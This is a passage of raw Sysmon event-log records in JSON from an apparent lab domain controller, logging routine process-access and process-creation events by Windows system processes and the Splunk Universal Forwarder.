06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1072-5F25-0000-00108E1B0400}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1072-5F25-0000-00108E1B0400}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.511\r\nProcessGuid: {E2A3D6B1-1073-5F25-0000-0010411D0400}\r\nProcessId: 3976\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.511","ProcessGuid":"{E2A3D6B1-1073-5F25-0000-0010411D0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1073-5F25-0000-0010411D0400}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1073-5F25-0000-0010411D0400}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1073-5F25-0000-0010411D0400}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1073-5F25-0000-0010411D0400}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 